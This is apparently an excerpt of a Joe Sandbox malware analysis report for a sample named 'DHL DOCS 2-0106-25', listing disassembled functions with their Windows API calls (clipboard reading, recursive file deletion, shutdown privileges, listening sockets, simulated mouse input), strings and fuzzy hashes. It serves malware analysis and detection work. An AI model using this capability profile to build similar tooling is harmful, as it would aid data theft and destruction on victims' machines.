GetProcessHeap.KERNEL32(00000000,00000000), ref: 00210D55
HeapFree.KERNEL32(00000000), ref: 00210D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00210D65
HeapFree.KERNEL32(00000000), ref: 00210D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00210D78
HeapFree.KERNEL32(00000000), ref: 00210D7F

Part of subcall function 00211193: GetProcessHeap.KERNEL32(00000008,00210BB1,?,00000000,?,00210BB1,?), ref: 002111A1
Part of subcall function 00211193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00210BB1,?), ref: 002111A8
Part of subcall function 00211193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00210BB1,?), ref: 002111B7

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: e6f0eaa5bbe074c014d793f987a814c31851f8a176affe1edf5be8c4e1a0681e
Instruction ID: bf9304c9f2b2c86ec8d92fe8fe617a4f97cf8fc8ce164b090ca06328d84ed7ed
Opcode Fuzzy Hash: e6f0eaa5bbe074c014d793f987a814c31851f8a176affe1edf5be8c4e1a0681e
Instruction Fuzzy Hash: 3B716E7590120AABDF10DFE4EC88FEEBBB8FF15300F144525E918A6191D7B1A995CFA0

Function 0022EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0024CC08), ref: 0022EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0022EB37
GetClipboardData.USER32(0000000D), ref: 0022EB43
CloseClipboard.USER32 ref: 0022EB4F
GlobalLock.KERNEL32(00000000), ref: 0022EB87
CloseClipboard.USER32 ref: 0022EB91
GlobalUnlock.KERNEL32(00000000), ref: 0022EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0022EBC9
GetClipboardData.USER32(00000001), ref: 0022EBD1
GlobalLock.KERNEL32(00000000), ref: 0022EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0022EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0022EC38
GetClipboardData.USER32(0000000F), ref: 0022EC44
GlobalLock.KERNEL32(00000000), ref: 0022EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0022EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0022EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0022ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0022ECF3
CountClipboardFormats.USER32 ref: 0022ED14
CloseClipboard.USER32 ref: 0022ED59

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 2189c6229ec3d0694aebeefe6d37acf32b0488bd92eb669994cc87f999ba99b7
Instruction ID: e0bbda2af4872a566c6f88bf0ce52bad1a2fd8ce0145d53f2c35ffc39a6874bf
Opcode Fuzzy Hash: 2189c6229ec3d0694aebeefe6d37acf32b0488bd92eb669994cc87f999ba99b7
Instruction Fuzzy Hash: F961F374204302AFD700EFA4E888F6A77E8BF95714F25451DF8568B2A1CB71DD05DB62

Function 0022698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002269BE
FindClose.KERNEL32(00000000), ref: 00226A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00226A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00226A75

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00226AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00226ADF

Strings

%02d, xrefs: 00226C00, 00226C0A, 00226C5A, 00226CAA, 00226CFA, 00226D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00226B32
%4d%02d%02d%02d%02d%02d, xrefs: 00226B6A
%03d, xrefs: 00226DA2
%4d, xrefs: 00226BB1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: afca091b003862c199200d46e760328a19ba01a1dd49d719836aeca0e2ea6c85
Instruction ID: 3824a7cc77cc8bd7a1f33c5a6362651ba23fbe5ebc7ce2f055a43467f87641b9
Opcode Fuzzy Hash: afca091b003862c199200d46e760328a19ba01a1dd49d719836aeca0e2ea6c85
Instruction Fuzzy Hash: B5D16F72508300AFC310EFA4D895EABB7ECAFA9704F04491DF589D7191EB74DA05CBA2

Function 00229642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00229663
GetFileAttributesW.KERNEL32(?), ref: 002296A1
SetFileAttributesW.KERNEL32(?,?), ref: 002296BB
FindNextFileW.KERNEL32(00000000,?), ref: 002296D3
FindClose.KERNEL32(00000000), ref: 002296DE
FindFirstFileW.KERNEL32(*.*,?), ref: 002296FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0022974A
SetCurrentDirectoryW.KERNEL32(00276B7C), ref: 00229768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00229772
FindClose.KERNEL32(00000000), ref: 0022977F
FindClose.KERNEL32(00000000), ref: 0022978F

Strings

*.*, xrefs: 002296F5

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 773b1ea3c2575463629be2ba08236de943e7a7d154d4f82cca21837d1cac11b6
Instruction ID: bc3d3c0afa0b2f7fbadb1c6ad14a1426d42be9279f23ef59d7f7a0fe2bbaddec
Opcode Fuzzy Hash: 773b1ea3c2575463629be2ba08236de943e7a7d154d4f82cca21837d1cac11b6
Instruction Fuzzy Hash: 1F31C27651162A7ADB14EFF9FC4CAEE77ACAF0A320F204156F905E2190DB70D9948E14

Function 0022979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002297BE
FindNextFileW.KERNEL32(00000000,?), ref: 00229819
FindClose.KERNEL32(00000000), ref: 00229824
FindFirstFileW.KERNEL32(*.*,?), ref: 00229840
SetCurrentDirectoryW.KERNEL32(?), ref: 00229890
SetCurrentDirectoryW.KERNEL32(00276B7C), ref: 002298AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002298B8
FindClose.KERNEL32(00000000), ref: 002298C5
FindClose.KERNEL32(00000000), ref: 002298D5

Part of subcall function 0021DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0021DB00

Strings

*.*, xrefs: 0022983B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: f2402521436e47749ef2730c75b64e3a2ee4fa112c4808cc55ac797da9061ef8
Instruction ID: b68fa00ae8c44da24748bead062f2ab07b842e55705e5f3438c48cf0497edbb5
Opcode Fuzzy Hash: f2402521436e47749ef2730c75b64e3a2ee4fa112c4808cc55ac797da9061ef8
Instruction Fuzzy Hash: E531C53151162A7ADB14EFF8FC48ADE77ACAF07320F244156E914E2191DB70D9A4CE25

Function 00228195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00228257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00228267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00228273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00228310
SetCurrentDirectoryW.KERNEL32(?), ref: 00228324
SetCurrentDirectoryW.KERNEL32(?), ref: 00228356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0022838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00228395

Strings

*.*, xrefs: 0022839B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 3527369136826d2d00686609ebc84787066998db3b5fd40be25c3bab8afc3f11
Instruction ID: 2f8b63d12814e224600d374dac91590a0c217b587251bdaf59da59d1e634ba72
Opcode Fuzzy Hash: 3527369136826d2d00686609ebc84787066998db3b5fd40be25c3bab8afc3f11
Instruction Fuzzy Hash: 1261BC72118315AFCB10EF64E8409AEB3E8FF99310F04895EF989C3251DB31E955CB92

Function 0021D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001B3A97,?,?,001B2E7F,?,?,?,00000000), ref: 001B3AC2

Part of subcall function 0021E199: GetFileAttributesW.KERNEL32(?,0021CF95), ref: 0021E19A

FindFirstFileW.KERNEL32(?,?), ref: 0021D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0021D1DD
MoveFileW.KERNEL32(?,?), ref: 0021D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0021D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0021D237

Part of subcall function 0021D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0021D21C,?,?), ref: 0021D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0021D253
FindClose.KERNEL32(00000000), ref: 0021D264

Strings

\*.*, xrefs: 0021D0CD, 0021D0D6, 0021D0EB

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 0a1ea5d757f5d200bbfc1d8eb7e92e3c073bab4e3afa9a922b492768e06f91ce
Instruction ID: 374c167c8860f4845111ff97e94fd0fd6f5884fc652e24cc0fafe9bb0d6231b4
Opcode Fuzzy Hash: 0a1ea5d757f5d200bbfc1d8eb7e92e3c073bab4e3afa9a922b492768e06f91ce
Instruction Fuzzy Hash: 34617C3180110EEBCF05EFE4D9929EDB7B5AF25300F604165E81677192EB30AF5ADB60

Function 0022ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0022ED91
EmptyClipboard.USER32 ref: 0022ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0022EDAC
CloseClipboard.USER32 ref: 0022EEA3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 96c12bda4b17ac3af7149cfdf046cadbc3ace72f31943c28e8dae33725021cbe
Instruction ID: a9b99961842db41c942a7321178cc629e2d2c003fc444e35bc86d95ff76ee093
Opcode Fuzzy Hash: 96c12bda4b17ac3af7149cfdf046cadbc3ace72f31943c28e8dae33725021cbe
Instruction Fuzzy Hash: 2141E135215221AFD720CF59F848B19BBE4FF45328F16C099E4158B762C775EC41CB90

Function 0021E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0021170D
Part of subcall function 002116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0021173A
Part of subcall function 002116C3: GetLastError.KERNEL32 ref: 0021174A

ExitWindowsEx.USER32(?,00000000), ref: 0021E932

Strings

, xrefs: 0021E95C
, xrefs: 0021E920
SeShutdownPrivilege, xrefs: 0021E902
@, xrefs: 0021E925

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: b56364becea237a0308422bff838197fc64d3c2fa45dabc51d529e9da352f6b7
Instruction ID: 07747b7aa39b2661c55f95a2ede18c1c29a5aea719dec0b71a9f10391eb4084f
Opcode Fuzzy Hash: b56364becea237a0308422bff838197fc64d3c2fa45dabc51d529e9da352f6b7
Instruction Fuzzy Hash: 3801DB76630311ABEF546678AC8ABFF72DC9B28750F164422FD03E21D1D5A55CE085E4

Function 00231204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 00231276
WSAGetLastError.WSOCK32 ref: 00231283
bind.WSOCK32(00000000,?,00000010), ref: 002312BA
WSAGetLastError.WSOCK32 ref: 002312C5
closesocket.WSOCK32(00000000), ref: 002312F4
listen.WSOCK32(00000000,00000005), ref: 00231303
WSAGetLastError.WSOCK32 ref: 0023130D
closesocket.WSOCK32(00000000), ref: 0023133C

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 0df364c223b168432a500359ed375b28da12e3dbe3c231bd8012a6f844b1c78d
Instruction ID: 19db37bcc55df8ad7c1f64b6c759e98f427fc83dd3f62d1ed69c011e480544c8
Opcode Fuzzy Hash: 0df364c223b168432a500359ed375b28da12e3dbe3c231bd8012a6f844b1c78d
Instruction Fuzzy Hash: 9F41B275A001119FD710DF28D488B6ABBE5BF86318F288188E8568F3D6C771ED91CBE1

Function 0021D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001B3A97,?,?,001B2E7F,?,?,?,00000000), ref: 001B3AC2

Part of subcall function 0021E199: GetFileAttributesW.KERNEL32(?,0021CF95), ref: 0021E19A

FindFirstFileW.KERNEL32(?,?), ref: 0021D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0021D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0021D481
FindClose.KERNEL32(00000000), ref: 0021D498
FindClose.KERNEL32(00000000), ref: 0021D4A1

Strings

\*.*, xrefs: 0021D3F2

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 75f2198b8b8979080018f1c25ffe9d48a00342fd90d99c47d53277e80fd3f2fb
Instruction ID: a4b72ee8e805bd251624d8bcfe5d292b11227f1a4c21da3d9ffa6053a04ff832
Opcode Fuzzy Hash: 75f2198b8b8979080018f1c25ffe9d48a00342fd90d99c47d53277e80fd3f2fb
Instruction Fuzzy Hash: 5C31A031019345ABC300EF64D8958EFB7E8BEB2314F944A1DF4D593191EB70AA19DB63

Function 001EE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001EE645

Strings

1#INF, xrefs: 001EF852
1#IND, xrefs: 001EF83D
1#QNAN, xrefs: 001EF84B
1#SNAN, xrefs: 001EF844

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: fd247c516302b3ed695a1c6cca0d2c48a4a53af640ad8a515717feece18924db
Instruction ID: bb1463d9d267a6eb090d4d6a442d3aeee5e70649ad531c39b6e7da110be18bba
Opcode Fuzzy Hash: fd247c516302b3ed695a1c6cca0d2c48a4a53af640ad8a515717feece18924db
Instruction Fuzzy Hash: 8FC23971E04A698FDB29CE299D407EEB7F5EB48305F1541EAD84DE7240E774AE828F40

Function 0022648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002264DC
CoInitialize.OLE32(00000000), ref: 00226639
CoCreateInstance.OLE32(0024FCF8,00000000,00000001,0024FB68,?), ref: 00226650
CoUninitialize.OLE32 ref: 002268D4

Strings

.lnk, xrefs: 002264BA, 00226524, 002265E0

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 7e17732b137fb8ba6cbbf352075de6ef90afa4aa8572ed0563066e19e158f711
Instruction ID: dce6f9c03aa862136f0016503791f2de1fdbc3b7d834bfa0ac7692bef361641c
Opcode Fuzzy Hash: 7e17732b137fb8ba6cbbf352075de6ef90afa4aa8572ed0563066e19e158f711
Instruction Fuzzy Hash: E5D16A71518211AFC304EF64D881DABB7E8FFA9304F50496DF5958B2A1EB30ED05CBA2

Function 002322DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 002322E8

Part of subcall function 0022E4EC: GetWindowRect.USER32(?,?), ref: 0022E504

GetDesktopWindow.USER32 ref: 00232312
GetWindowRect.USER32(00000000), ref: 00232319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00232355
GetCursorPos.USER32(?), ref: 00232381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002323DF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: ad7d014d1000e858b57c67eedf5ac849c7a334a67af8fef8a0ae78557975fb68
Instruction ID: 2bc80b506796012cfa6acde67457831d78537f6e2fe99f7565f3dab4ecf773c4
Opcode Fuzzy Hash: ad7d014d1000e858b57c67eedf5ac849c7a334a67af8fef8a0ae78557975fb68
Instruction Fuzzy Hash: FE3100B2515316AFDB20DF18DC49B9BBBE9FF85310F100919F985A7181DB34EA18CB92

Function 00229B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00229B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00229C8B

Part of subcall function 00223874: GetInputState.USER32 ref: 002238CB
Part of subcall function 00223874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00223966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00229BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00229C75

Strings

*.*, xrefs: 00229B5D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
